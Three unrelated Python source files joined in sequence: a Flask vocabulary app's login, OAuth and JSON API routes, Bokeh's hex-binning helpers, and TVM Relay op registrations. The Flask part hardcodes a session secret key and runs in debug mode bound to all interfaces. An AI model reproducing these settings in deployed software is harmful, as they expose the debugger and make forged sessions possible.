for x in xrange(32))
login_session['state'] = state
context = {'is_user_logged_in': is_user_logged_in,
'STATE': state}
if request.method == 'POST':
user_email = request.form['email']
user_id = get_user_id(user_email)
user_password = request.form['password']
if user_id:
user = session.query(User).filter_by(id=user_id).one()
if user.verify_password(user_password):
login_session['user_id'] = user.id
login_session['username'] = user.username
login_session['email'] = user.email
login_session['picture'] = None
login_session['provider'] = 'morewords'
is_user_logged_in = True
languages = session.query(Language).order_by('name').all()
latest_words = (session.query(Word).order_by('id desc').
limit(10))
context = {'languages': languages,
'latest_words': latest_words,
'is_user_logged_in': is_user_logged_in}
flash('Hello %s!' % user.username)
return render_template('vocabulary.html', **context)
flash('Email or password incorrect. Try again.')
return render_template('login.html', **context)
@app.route('/gconnect', methods=['POST'])
def gconnect():
"""Connect with Google OAuth service to login a Google user."""
# Validate state token
if request.args.get('state') != login_session['state']:
response = make_response(json.dumps('Invalid state parameter.'), 401)
response.headers['Content-Type'] = 'application/json'
return response
# Obtain authorization code
code = request.data
try:
# Upgrade the authorization code into a credentials object
oauth_flow = flow_from_clientsecrets('client_secrets.json', scope='')
oauth_flow.redirect_uri = 'postmessage'
credentials = oauth_flow.step2_exchange(code)
except FlowExchangeError:
response = (make_response(
json.dumps('Failed to upgrade the authorization code.'),
401))
response.headers['Content-Type'] = 'application/json'
return response
# Check that the access token is valid.
access_token = credentials.access_token
url = ('https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=%s'
% access_token)
h = httplib2.Http()
result = json.loads(h.request(url, 'GET')[1])
# If there was an error in the access token info, abort.
if result.get('error') is not None:
response = make_response(json.dumps(result.get('error')), 500)
response.headers['Content-Type'] = 'application/json'
return response
# Verify that the access token is used for the intended user.
gplus_id = credentials.id_token['sub']
if result['user_id'] != gplus_id:
response = (make_response(
json.dumps("Token's user ID doesn't match given user ID."),
401))
response.headers['Content-Type'] = 'application/json'
return response
# Verify that the access token is valid for this app.
CLIENT_ID = json.loads(
open('client_secrets.json', 'r').read())['web']['client_id']
if result['issued_to'] != CLIENT_ID:
response = (make_response(
json.dumps("Token's client ID does not match app's."),
401))
response.headers['Content-Type'] = 'application/json'
return response
stored_access_token = login_session.get('access_token')
stored_gplus_id = login_session.get('gplus_id')
if stored_access_token is not None and gplus_id == stored_gplus_id:
response = (make_response(
json.dumps('Current user is already connected.'), 200))
response.headers['Content-Type'] = 'application/json'
return response
# Store the access token in the session for later use.
login_session['access_token'] = credentials.access_token
login_session['gplus_id'] = gplus_id
# Get user info
userinfo_url = "https://www.googleapis.com/oauth2/v1/userinfo"
params = {'access_token': credentials.access_token, 'alt': 'json'}
answer = requests.get(userinfo_url, params=params)
data = answer.json()
login_session['provider'] = 'google'
login_session['username'] = data['name']
login_session['picture'] = data['picture']
login_session['email'] = data['email']
# see if user exists, if not make a new one
user_id = get_user_id(login_session['email'])
if not user_id:
user_id = create_user(login_session)
login_session['user_id'] = user_id
flash("Hello %s!" % login_session['username'])
return str(login_session)
@app.route('/fbconnect', methods=['POST'])
def fbconnect():
"""Connect with Facebook OAuth service to login a Facebook user."""
if request.args.get('state') != login_session['state']:
response = make_response(json.dumps('Invalid state parameter.'), 401)
response.headers['Content-Type'] = 'application/json'
return response
access_token = request.data
app_id = (json.loads(open('fb_client_secrets.json', 'r').
read())['web']['app_id'])
app_secret = (json.loads(
open('fb_client_secrets.json', 'r').
read())['web']['app_secret'])
url = 'https://graph.facebook.com/oauth/access_token?grant_type=fb_exchange_token&client_id=%s&client_secret=%s&fb_exchange_token=%s' % ( # nopep8
app_id, app_secret, access_token)
h = httplib2.Http()
result = h.request(url, 'GET')[1]
userinfo_url = "https://graph.facebook.com/v3.2/me"
'''
    The token-exchange response comes back as a comma-separated list of
    key/value pairs. We split on commas and take the first entry, which
    holds the access token as key : value, then split on the colon to pull
    out the token value and strip the surrounding quotes so the token can
    be used directly in Graph API calls.
'''
token = result.split(',')[0].split(':')[1].replace('"', '')
# Get user data
url = 'https://graph.facebook.com/v3.2/me?access_token=%s&fields=name,id,email' % token # nopep8
h = httplib2.Http()
result = h.request(url, 'GET')[1]
data = json.loads(result)
login_session['provider'] = 'facebook'
login_session['username'] = data["name"]
login_session['email'] = data["email"]
login_session['facebook_id'] = data["id"]
login_session['access_token'] = token
# Get user picture
url = 'https://graph.facebook.com/v3.2/me/picture?access_token=%s&redirect=0&height=200&width=200' % token # nopep8
h = httplib2.Http()
result = h.request(url, 'GET')[1]
data = json.loads(result)
login_session['picture'] = data["data"]["url"]
# See if user exists, if not make a new one
user_id = get_user_id(login_session['email'])
if not user_id:
user_id = create_user(login_session)
login_session['user_id'] = user_id
flash("Hello %s!" % login_session['username'])
return str(login_session)
@app.route('/gdisconnect')
def gdisconnect():
"""Disconnect a Google user."""
# Only disconnect a connected user.
access_token = login_session.get('access_token')
if access_token is None:
response = (make_response(
json.dumps('Current user not connected.'), 401))
response.headers['Content-Type'] = 'application/json'
return response
url = 'https://accounts.google.com/o/oauth2/revoke?token=%s' % access_token
h = httplib2.Http()
result = h.request(url, 'GET')[0]
if result['status'] == '200':
response = (make_response(
json.dumps('Successfully disconnected.'), 200))
response.headers['Content-Type'] = 'application/json'
return response
else:
response = (make_response(
json.dumps('Failed to revoke token for given user.'), 400))
response.headers['Content-Type'] = 'application/json'
return response
# Facebook disconnect
@app.route('/fbdisconnect')
def fbdisconnect():
"""Disconnect a Facebook user."""
facebook_id = login_session['facebook_id']
access_token = login_session['access_token']
url = ('https://graph.facebook.com/%s/permissions?access_token=%s' %
(facebook_id, access_token))
h = httplib2.Http()
h.request(url, 'DELETE')[1]
return
@app.route('/disconnect')
def disconnect():
"""Disconnect users based on provider."""
if 'provider' in login_session:
if login_session['provider'] == 'google':
gdisconnect()
del login_session['gplus_id']
del login_session['access_token']
if login_session['provider'] == 'facebook':
fbdisconnect()
del login_session['facebook_id']
del login_session['username']
del login_session['email']
del login_session['picture']
del login_session['user_id']
del login_session['provider']
flash("You have successfully been logged out.")
return redirect(url_for('vocabulary'))
else:
flash("You were not logged in")
return redirect(url_for('vocabulary'))
# API Endpoint
@app.route('/api/v0/vocabulary', methods=['GET'])
def vocabulary_json():
"""List all words grouped by language."""
languages = session.query(Language).all()
serialized_languages = [l.serialize for l in languages]
for i in range(len(serialized_languages)):
words = (session.query(Word).
filter_by(language_id=serialized_languages[i]["id"]).all())
serialized_words = [w.serialize for w in words]
serialized_languages[i]["Words"] = serialized_words
return jsonify(Vocabulary=serialized_languages)
@app.route('/api/v0/languages', methods=['GET'])
def language_list_json():
"""List all languages."""
languages = session.query(Language).all()
return jsonify(Languages=[l.serialize for l in languages])
@app.route('/api/v0/words', methods=['GET'])
def word_list_json():
"""List all words."""
words = session.query(Word).all()
return jsonify(Words=[w.serialize for w in words])
@app.route('/api/v0/languages/<string:language_name>/words', methods=['GET'])
def language_word_list_json(language_name):
"""List all words in the given language."""
language = session.query(Language).filter_by(name=language_name).one()
words = session.query(Word).filter_by(language_id=language.id)
return jsonify(Words=[w.serialize for w in words])
@app.route('/api/v0/languages/<string:language_name>/words/<string:word_name>',
methods=['GET'])
def language_word_json(language_name, word_name):
"""List all entries for a given word in the given language."""
language = session.query(Language).filter_by(name=language_name).one()
word_query = session.query(Word).filter_by(language_id=language.id,
name=word_name)
return jsonify(Word=[w.serialize for w in word_query])
@app.route('/api/v0/words/<string:word_name>', methods=['GET'])
def word_json(word_name):
"""List all entries for the given word in any language."""
word_query = session.query(Word).filter_by(name=word_name)
return jsonify(Word=[w.serialize for w in word_query])
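# Illustrative usage of the JSON API routes above (a sketch only, not
# executed). The host/port assume the development server started at the
# bottom of this file; "French" and "bonjour" are placeholder values.
#   curl http://localhost:5000/api/v0/vocabulary
#   curl http://localhost:5000/api/v0/languages
#   curl http://localhost:5000/api/v0/words
#   curl http://localhost:5000/api/v0/languages/French/words
#   curl http://localhost:5000/api/v0/languages/French/words/bonjour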
def create_user(login_session):
"""Helper function that creates a user."""
new_user = User(username=login_session['username'],
email=login_session['email'],
picture=login_session['picture'])
session.add(new_user)
session.commit()
user = session.query(User).filter_by(email=login_session['email']).one()
return user.id
def get_user_id(email):
"""Helper function that retrieves a user id from the given email."""
try:
user = session.query(User).filter_by(email=email).one()
return user.id
except NoResultFound:
return None
if __name__ == '__main__':
app.secret_key = "super_secret_key"
app.debug = True
app.run(host='0.0.0.0', port=5000)
|
the-stack_106_22058
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2020, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
''' Functions useful for dealing with hexagonal tilings.
For more information on the concepts employed here, see this informative page
https://www.redblobgames.com/grids/hexagons/
'''
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
import logging # isort:skip
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
from typing import Any, Tuple
# External imports
import numpy as np
# Bokeh imports
from .dependencies import import_required
#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------
__all__ = (
'axial_to_cartesian',
'cartesian_to_axial',
'hexbin',
)
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
def axial_to_cartesian(q: Any, r: Any, size: float, orientation: str, aspect_scale: float = 1) -> Tuple[Any, Any]:
''' Map axial *(q,r)* coordinates to cartesian *(x,y)* coordinates of
    tile centers.
This function can be useful for positioning other Bokeh glyphs with
cartesian coordinates in relation to a hex tiling.
This function was adapted from:
https://www.redblobgames.com/grids/hexagons/#hex-to-pixel
Args:
q (array[float]) :
A NumPy array of q-coordinates for binning
r (array[float]) :
A NumPy array of r-coordinates for binning
size (float) :
The size of the hexagonal tiling.
The size is defined as the distance from the center of a hexagon
to the top corner for "pointytop" orientation, or from the center
to a side corner for "flattop" orientation.
orientation (str) :
Whether the hex tile orientation should be "pointytop" or
"flattop".
aspect_scale (float, optional) :
Scale the hexagons in the "cross" dimension.
For "pointytop" orientations, hexagons are scaled in the horizontal
direction. For "flattop", they are scaled in vertical direction.
When working with a plot with ``aspect_scale != 1``, it may be
useful to set this value to match the plot.
Returns:
(array[int], array[int])
'''
if orientation == "pointytop":
x = size * np.sqrt(3) * (q + r/2.0) / aspect_scale
y = -size * 3/2.0 * r
else:
x = size * 3/2.0 * q
y = -size * np.sqrt(3) * (r + q/2.0) * aspect_scale
return (x, y)
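# Worked example (a sketch, not part of the public API): in the "pointytop"
# branch above with size=1 and aspect_scale=1, the tile at axial (q=1, r=0)
# maps to x = sqrt(3) * (1 + 0/2) ~= 1.732, y = -1.5 * 0 = 0, while the tile
# at (q=0, r=1) maps to x = sqrt(3) * 0.5 ~= 0.866, y = -1.5.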
def cartesian_to_axial(x: Any, y: Any, size: float, orientation: str, aspect_scale: float = 1) -> Tuple[Any, Any]:
    ''' Map Cartesian *(x,y)* points to axial *(q,r)* coordinates of enclosing
tiles.
This function was adapted from:
https://www.redblobgames.com/grids/hexagons/#pixel-to-hex
Args:
x (array[float]) :
A NumPy array of x-coordinates to convert
y (array[float]) :
A NumPy array of y-coordinates to convert
size (float) :
The size of the hexagonal tiling.
The size is defined as the distance from the center of a hexagon
to the top corner for "pointytop" orientation, or from the center
to a side corner for "flattop" orientation.
orientation (str) :
Whether the hex tile orientation should be "pointytop" or
"flattop".
aspect_scale (float, optional) :
Scale the hexagons in the "cross" dimension.
For "pointytop" orientations, hexagons are scaled in the horizontal
direction. For "flattop", they are scaled in vertical direction.
When working with a plot with ``aspect_scale != 1``, it may be
useful to set this value to match the plot.
Returns:
(array[int], array[int])
'''
HEX_FLAT = [2.0/3.0, 0.0, -1.0/3.0, np.sqrt(3.0)/3.0]
HEX_POINTY = [np.sqrt(3.0)/3.0, -1.0/3.0, 0.0, 2.0/3.0]
coords = HEX_FLAT if orientation == 'flattop' else HEX_POINTY
x = x / size * (aspect_scale if orientation == "pointytop" else 1)
y = -y / size / (aspect_scale if orientation == "flattop" else 1)
q = coords[0] * x + coords[1] * y
r = coords[2] * x + coords[3] * y
return _round_hex(q, r)
def hexbin(x: Any, y: Any, size: float, orientation: str = "pointytop", aspect_scale: float = 1) -> Any:
''' Perform an equal-weight binning of data points into hexagonal tiles.
For more sophisticated use cases, e.g. weighted binning or scaling
individual tiles proportional to some other quantity, consider using
HoloViews.
Args:
x (array[float]) :
A NumPy array of x-coordinates for binning
y (array[float]) :
A NumPy array of y-coordinates for binning
size (float) :
The size of the hexagonal tiling.
The size is defined as the distance from the center of a hexagon
to the top corner for "pointytop" orientation, or from the center
to a side corner for "flattop" orientation.
orientation (str, optional) :
Whether the hex tile orientation should be "pointytop" or
"flattop". (default: "pointytop")
aspect_scale (float, optional) :
Match a plot's aspect ratio scaling.
When working with a plot with ``aspect_scale != 1``, this
parameter can be set to match the plot, in order to draw
regular hexagons (instead of "stretched" ones).
This is roughly equivalent to binning in "screen space", and
it may be better to use axis-aligned rectangular bins when
plot aspect scales are not one.
Returns:
DataFrame
The resulting DataFrame will have columns *q* and *r* that specify
hexagon tile locations in axial coordinates, and a column *counts* that
provides the count for each tile.
.. warning::
Hex binning only functions on linear scales, i.e. not on log plots.
'''
pd: Any = import_required('pandas','hexbin requires pandas to be installed')
q, r = cartesian_to_axial(x, y, size, orientation, aspect_scale=aspect_scale)
df = pd.DataFrame(dict(r=r, q=q))
return df.groupby(['q', 'r']).size().reset_index(name='counts')
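def _hexbin_usage_sketch():
    ''' Minimal usage sketch of the functions above (illustrative only, not
    part of the public API). Data and sizes are made up; ``np`` is the
    module-level NumPy import.
    '''
    x = np.random.standard_normal(500)
    y = np.random.standard_normal(500)
    # Bin the points into pointytop hexagons of size 0.2.
    bins = hexbin(x, y, 0.2)
    # Recover the cartesian centers of the occupied tiles, e.g. to position
    # labels or other glyphs on top of a hex tiling.
    cx, cy = axial_to_cartesian(bins.q, bins.r, 0.2, "pointytop")
    return bins, cx, cy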
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
def _round_hex(q: Any, r: Any) -> Tuple[Any, Any]:
''' Round floating point axial hex coordinates to integer *(q,r)*
coordinates.
This code was adapted from:
https://www.redblobgames.com/grids/hexagons/#rounding
Args:
        q (array[float]) :
            NumPy array of floating point axial *q* coordinates to round
        r (array[float]) :
            NumPy array of floating point axial *r* coordinates to round
Returns:
(array[int], array[int])
'''
x = q
z = r
y = -x-z
rx = np.round(x)
ry = np.round(y)
rz = np.round(z)
dx = np.abs(rx - x)
dy = np.abs(ry - y)
dz = np.abs(rz - z)
cond = (dx > dy) & (dx > dz)
q = np.where(cond , -(ry + rz), rx)
r = np.where(~cond & ~(dy > dz), -(rx + ry), rz)
return q.astype(int), r.astype(int)
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
|
the-stack_106_22059
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=no-else-return, invalid-name, unused-argument, too-many-arguments, consider-using-in
"""Backend compiler related feature registration"""
from __future__ import absolute_import
from tvm import topi
from tvm.topi.utils import get_const_tuple
from tvm.runtime import convert
from tvm.te.hybrid import script
from .. import op as reg
from .. import strategy
from ..op import OpPattern
from .._tensor import elemwise_shape_func
from ..strategy.generic import is_depthwise_conv2d
from ...transform import LayoutConfig
from ....ir import container
from ....tir import expr
# relu
reg.register_broadcast_schedule("nn.relu")
reg.register_pattern("nn.relu", OpPattern.ELEMWISE)
# softmax
reg.register_strategy("nn.softmax", strategy.softmax_strategy)
reg.register_pattern("nn.softmax", OpPattern.OPAQUE)
# fast softmax
reg.register_strategy("nn.fast_softmax", strategy.fast_softmax_strategy)
reg.register_pattern("nn.fast_softmax", OpPattern.OPAQUE)
# log_softmax
reg.register_schedule("nn.log_softmax", strategy.schedule_log_softmax)
reg.register_pattern("nn.log_softmax", OpPattern.OPAQUE)
@reg.register_legalize("nn.dense")
def legalize_dense(attrs, inputs, types):
"""Legalize dense op.
Parameters
----------
attrs : tvm.ir.Attrs
Attributes of current convolution
inputs : list of tvm.relay.Expr
The args of the Relay expr to be legalized
types : list of types
List of input and output types
Returns
-------
result : tvm.relay.Expr
The legalized expr
"""
return topi.nn.dense_legalize(attrs, inputs, types)
# dense
reg.register_strategy("nn.dense", strategy.dense_strategy)
reg.register_pattern("nn.dense", reg.OpPattern.OUT_ELEMWISE_FUSABLE)
@reg.register_alter_op_layout("nn.dense")
def alter_op_layout_dense(attrs, inputs, tinfos, out_type):
"""Alternate the layout of dense"""
return topi.nn.dense_alter_layout(attrs, inputs, tinfos, out_type)
# dense_pack
reg.register_strategy("nn.contrib_dense_pack", strategy.dense_pack_strategy)
reg.register_pattern("nn.contrib_dense_pack", reg.OpPattern.OUT_ELEMWISE_FUSABLE)
# fifo_buffer
@reg.register_compute("nn.fifo_buffer")
def compute_fifo_buffer(attrs, inputs, out_type):
return [topi.nn.fifo_buffer(inputs[0], inputs[1], axis=attrs.get_int("axis"))]
reg.register_injective_schedule("nn.fifo_buffer")
reg.register_pattern("nn.fifo_buffer", OpPattern.OPAQUE)
@reg.register_legalize("nn.batch_matmul")
def legalize_batch_matmul(attrs, inputs, types):
"""Legalize batch_matmul op.
Parameters
----------
attrs : tvm.ir.Attrs
Attributes of current convolution
inputs : list of tvm.relay.Expr
The args of the Relay expr to be legalized
types : list of types
List of input and output types
Returns
-------
result : tvm.relay.Expr
The legalized expr
"""
return topi.nn.batch_matmul_legalize(attrs, inputs, types)
# batch_matmul
reg.register_strategy("nn.batch_matmul", strategy.batch_matmul_strategy)
reg.register_pattern("nn.batch_matmul", reg.OpPattern.OUT_ELEMWISE_FUSABLE)
# sparse_dense
@reg.register_compute("nn.sparse_dense")
def compute_sparse_dense(attrs, inputs, out_type):
"""Compute definition of sparse_dense"""
return [topi.nn.sparse_dense(inputs[0], inputs[1], inputs[2], inputs[3], attrs["sparse_lhs"])]
reg.register_strategy("nn.sparse_dense", strategy.sparse_dense_strategy)
reg.register_pattern("nn.sparse_dense", reg.OpPattern.OUT_ELEMWISE_FUSABLE)
@reg.register_alter_op_layout("nn.sparse_dense")
def alter_op_layout_sparse_dense(attrs, inputs, tinfos, out_type):
"""Alternate the layout of sparse_dense"""
return topi.nn.sparse_dense_alter_layout(attrs, inputs, tinfos, out_type)
# sparse_add
reg.register_strategy("nn.sparse_add", strategy.sparse_add_strategy)
reg.register_pattern("nn.sparse_add", reg.OpPattern.OPAQUE)
@reg.register_compute("nn.internal.sparse_dense_padded")
def compute_sparse_dense_padded(attrs, inputs, out_type):
"""Compute definition of sparse_dense_padded"""
raise NotImplementedError("nn.internal.sparse_dense_padded is only available on cuda")
reg.register_strategy("nn.internal.sparse_dense_padded", strategy.sparse_dense_padded_strategy)
reg.register_pattern("nn.internal.sparse_dense_padded", reg.OpPattern.OUT_ELEMWISE_FUSABLE)
# sparse_transpose
@reg.register_compute("nn.sparse_transpose")
def compute_sparse_transpose(attrs, inputs, out_type):
"""Compute definition of sparse_transpose"""
return topi.nn.sparse_transpose(inputs[0], inputs[1], inputs[2])
reg.register_schedule("nn.sparse_transpose", strategy.schedule_sparse_transpose)
reg.register_pattern("nn.sparse_transpose", reg.OpPattern.OUT_ELEMWISE_FUSABLE)
# sparse_conv2d
@reg.register_compute("nn.sparse_conv2d")
def compute_sparse_conv2d(attrs, inputs, out_type):
"""Compute definition of sparse_conv2d"""
return [topi.nn.sparse_conv2d(inputs[0], inputs[1], inputs[2], inputs[3], attrs["layout"])]
reg.register_strategy("nn.sparse_conv2d", strategy.sparse_conv2d_strategy)
reg.register_pattern("nn.sparse_conv2d", reg.OpPattern.OUT_ELEMWISE_FUSABLE)
# conv1d
reg.register_strategy("nn.conv1d", strategy.conv1d_strategy)
reg.register_pattern("nn.conv1d", OpPattern.OUT_ELEMWISE_FUSABLE)
# conv2d
reg.register_strategy("nn.conv2d", strategy.conv2d_strategy)
reg.register_pattern("nn.conv2d", OpPattern.OUT_ELEMWISE_FUSABLE)
@reg.register_alter_op_layout("nn.conv2d")
def alter_op_layout_conv2d(attrs, inputs, tinfos, out_type):
"""Alternate the layout of conv2d"""
return topi.nn.conv2d_alter_layout(attrs, inputs, tinfos, out_type)
@reg.register_legalize("nn.conv2d")
def legalize_conv2d(attrs, inputs, types):
"""Legalize conv2d op.
Parameters
----------
attrs : tvm.ir.Attrs
Attributes of current convolution
inputs : list of tvm.relay.Expr
The args of the Relay expr to be legalized
types : list of types
List of input and output types
Returns
-------
result : tvm.relay.Expr
The legalized expr
"""
return topi.nn.conv2d_legalize(attrs, inputs, types)
@reg.register_convert_op_layout("nn.conv2d")
def convert_conv2d(attrs, inputs, tinfos, desired_layouts):
"""Convert Layout pass registration for conv2d op.
Parameters
----------
attrs : tvm.ir.Attrs
Attributes of current convolution
inputs : list of tvm.relay.Expr
The args of the Relay expr to be legalized
tinfos : list of types
List of input and output types
desired_layouts : list of layout strings
List of layouts defining our desired
layout for the data and kernel inputs respectively.
Returns
-------
result : tvm.relay.Expr
The transformed expr
"""
# pylint: disable=import-outside-toplevel
from tvm import relay
data, weight = inputs
# First check if there is a LayoutConfig scope, and if so, whether
# it indicates we should ignore this layer or not.
layout_config = LayoutConfig.current
if layout_config is not None:
skip_layer = layout_config.check_skip()
if skip_layer:
return relay.nn.conv2d(data, weight, **attrs)
# Prepare new layout.
new_attrs = dict(attrs)
assert len(desired_layouts) == 2, "A desired layout is expected for both of nn.conv2d's inputs"
desired_data_layout, desired_kernel_layout = map(str, desired_layouts)
assert desired_data_layout != "default", "Data layout cannot be default"
new_attrs["data_layout"] = desired_data_layout
if desired_kernel_layout != "default":
new_attrs["kernel_layout"] = desired_kernel_layout
return relay.nn.conv2d(data, weight, **new_attrs)
# Handle default kernel layouts
if desired_data_layout == "NCHW":
new_attrs["kernel_layout"] = "OIHW"
return relay.nn.conv2d(data, weight, **new_attrs)
elif desired_data_layout == "NHWC":
# Check for depthwise convolution.
data_info, weight_info = tinfos
if is_depthwise_conv2d(
data_info.shape,
attrs["data_layout"],
weight_info.shape,
attrs["kernel_layout"],
attrs["groups"],
):
new_attrs["kernel_layout"] = "HWOI"
else:
new_attrs["kernel_layout"] = "HWIO"
return relay.nn.conv2d(data, weight, **new_attrs)
elif desired_data_layout == "HWNC":
new_attrs["kernel_layout"] = "HWOI"
return relay.nn.conv2d(data, weight, **new_attrs)
raise ValueError("Layout %s is not yet supported." % desired_data_layout)
# conv2d_transpose
reg.register_strategy("nn.conv2d_transpose", strategy.conv2d_transpose_strategy)
reg.register_pattern("nn.conv2d_transpose", OpPattern.OUT_ELEMWISE_FUSABLE)
@reg.register_legalize("nn.conv2d_transpose")
def legalize_conv2d_transpose(attrs, inputs, types):
"""Legalize conv2d_transpose op.
Parameters
----------
attrs : tvm.ir.Attrs
Attributes of current Transposed convolution
inputs : list of tvm.relay.Expr
The args of the Relay expr to be legalized
types : list of types
List of input and output types
Returns
-------
result : tvm.relay.Expr
The legalized expr
"""
return topi.nn.conv2d_transpose_legalize(attrs, inputs, types)
@reg.register_convert_op_layout("nn.conv2d_transpose")
def convert_conv2d_transpose(attrs, inputs, tinfos, desired_layouts):
"""Convert Layout pass registration for conv2d_transpose op.
Parameters
----------
attrs : tvm.ir.Attrs
Attributes of current convolution
inputs : list of tvm.relay.Expr
The args of the Relay expr to be legalized
tinfos : list of types
List of input and output types
desired_layouts : list of layout strings
List of layouts defining our desired
layout for the data and kernel inputs respectively.
Returns
-------
result : tvm.relay.Expr
The transformed expr
"""
# pylint: disable=import-outside-toplevel
from tvm import relay
data, weight = inputs
new_attrs = dict(attrs)
assert len(desired_layouts) == 2, "A desired layout is expected for both of nn.conv2d's inputs"
desired_data_layout, desired_kernel_layout = map(str, desired_layouts)
assert desired_data_layout != "default", "Data layout cannot be default"
new_attrs["data_layout"] = desired_data_layout
if desired_kernel_layout != "default":
new_attrs["kernel_layout"] = desired_kernel_layout
return relay.nn.conv2d_transpose(data, weight, **new_attrs)
# Handle default kernel layouts
if desired_data_layout == "NCHW":
new_attrs["kernel_layout"] = "OIHW"
return relay.nn.conv2d_transpose(data, weight, **new_attrs)
elif desired_data_layout == "NHWC":
new_attrs["kernel_layout"] = "HWIO"
return relay.nn.conv2d_transpose(data, weight, **new_attrs)
raise ValueError("Layout %s is not yet supported." % desired_data_layout)
# conv3d_transpose
reg.register_strategy("nn.conv3d_transpose", strategy.conv3d_transpose_strategy)
reg.register_pattern("nn.conv3d_transpose", OpPattern.OUT_ELEMWISE_FUSABLE)
@reg.register_legalize("nn.conv3d_transpose")
def legalize_conv3d_transpose(attrs, inputs, types):
"""Legalize conv3d_transpose op.
Parameters
----------
attrs : tvm.ir.Attrs
Attributes of current Transposed convolution
inputs : list of tvm.relay.Expr
The args of the Relay expr to be legalized
types : list of types
List of input and output types
Returns
-------
result : tvm.relay.Expr
The legalized expr
"""
return topi.nn.conv3d_transpose_legalize(attrs, inputs, types)
# conv3d
reg.register_strategy("nn.conv3d", strategy.conv3d_strategy)
reg.register_pattern("nn.conv3d", OpPattern.OUT_ELEMWISE_FUSABLE)
@reg.register_alter_op_layout("nn.conv3d")
def alter_op_layout_conv3d(attrs, inputs, tinfos, out_type):
"""Alternate the layout of conv3d"""
return topi.nn.conv3d_alter_layout(attrs, inputs, tinfos, out_type)
@reg.register_convert_op_layout("nn.conv3d")
def convert_conv3d(attrs, inputs, tinfos, desired_layouts):
"""Convert Layout pass registration for conv3d op.
Parameters
----------
attrs : tvm.ir.Attrs
Attributes of current convolution
inputs : list of tvm.relay.Expr
The args of the Relay expr to be legalized
tinfos : list of types
List of input and output types
desired_layouts : list of layout strings
List of layouts defining our desired
layout for the data and kernel inputs respectively.
Returns
-------
result : tvm.relay.Expr
The transformed expr
"""
# pylint: disable=import-outside-toplevel
from tvm import relay
data, weight = inputs
new_attrs = dict(attrs)
assert len(desired_layouts) == 2, "A desired layout is expected for both of nn.conv3d's inputs"
desired_data_layout, desired_kernel_layout = map(str, desired_layouts)
assert desired_data_layout != "default", "Data layout cannot be default"
new_attrs["data_layout"] = desired_data_layout
if desired_kernel_layout != "default":
new_attrs["kernel_layout"] = desired_kernel_layout
return relay.nn.conv3d(data, weight, **new_attrs)
# Handle default kernel layouts
if desired_data_layout == "NCDHW":
new_attrs["kernel_layout"] = "OIDHW"
return relay.nn.conv3d(data, weight, **new_attrs)
elif desired_data_layout == "NDHWC":
new_attrs["kernel_layout"] = "DHWIO"
return relay.nn.conv3d(data, weight, **new_attrs)
raise ValueError("Layout %s is not yet supported" % desired_data_layout)
# conv3d_winograd related operators
reg.register_strategy(
"nn.contrib_conv3d_winograd_without_weight_transform",
strategy.conv3d_winograd_without_weight_transfrom_strategy,
)
reg.register_pattern(
"nn.contrib_conv3d_winograd_without_weight_transform", OpPattern.OUT_ELEMWISE_FUSABLE
)
@reg.register_compute("nn.contrib_conv3d_winograd_weight_transform")
def compute_contrib_conv3d_winograd_weight_transform(attrs, inputs, out_dtype):
"""Compute definition of contrib_conv3d_winograd_weight_transform"""
out = topi.nn.conv3d_winograd_weight_transform(inputs[0], attrs.get_int("tile_size"))
return [out]
reg.register_schedule(
"nn.contrib_conv3d_winograd_weight_transform",
strategy.schedule_conv3d_winograd_weight_transform,
)
reg.register_pattern("nn.contrib_conv3d_winograd_weight_transform", OpPattern.OUT_ELEMWISE_FUSABLE)
# conv1d_transpose
reg.register_strategy("nn.conv1d_transpose", strategy.conv1d_transpose_strategy)
reg.register_pattern("nn.conv1d_transpose", OpPattern.OUT_ELEMWISE_FUSABLE)
# bias_add
reg.register_injective_schedule("nn.bias_add")
reg.register_pattern("nn.bias_add", OpPattern.BROADCAST)
# max_pool1d
reg.register_schedule("nn.max_pool1d", strategy.schedule_pool)
reg.register_pattern("nn.max_pool1d", OpPattern.OUT_ELEMWISE_FUSABLE)
# max_pool2d
reg.register_schedule("nn.max_pool2d", strategy.schedule_pool)
reg.register_pattern("nn.max_pool2d", OpPattern.OUT_ELEMWISE_FUSABLE)
# max_pool3d
reg.register_schedule("nn.max_pool3d", strategy.schedule_pool)
reg.register_pattern("nn.max_pool3d", OpPattern.OUT_ELEMWISE_FUSABLE)
# avg_pool1d
reg.register_schedule("nn.avg_pool1d", strategy.schedule_pool)
reg.register_pattern("nn.avg_pool1d", OpPattern.OUT_ELEMWISE_FUSABLE)
# avg_pool2d
reg.register_schedule("nn.avg_pool2d", strategy.schedule_pool)
reg.register_pattern("nn.avg_pool2d", OpPattern.OUT_ELEMWISE_FUSABLE)
# avg_pool3d
reg.register_schedule("nn.avg_pool3d", strategy.schedule_pool)
reg.register_pattern("nn.avg_pool3d", OpPattern.OUT_ELEMWISE_FUSABLE)
# max_pool2d_grad
reg.register_schedule("nn.max_pool2d_grad", strategy.schedule_pool_grad)
reg.register_pattern("nn.max_pool2d_grad", OpPattern.OUT_ELEMWISE_FUSABLE)
# avg_pool2d_grad
reg.register_schedule("nn.avg_pool2d_grad", strategy.schedule_pool_grad)
reg.register_pattern("nn.avg_pool2d_grad", OpPattern.OUT_ELEMWISE_FUSABLE)
# adaptive_max_pool1d
reg.register_schedule("nn.adaptive_max_pool1d", strategy.schedule_adaptive_pool)
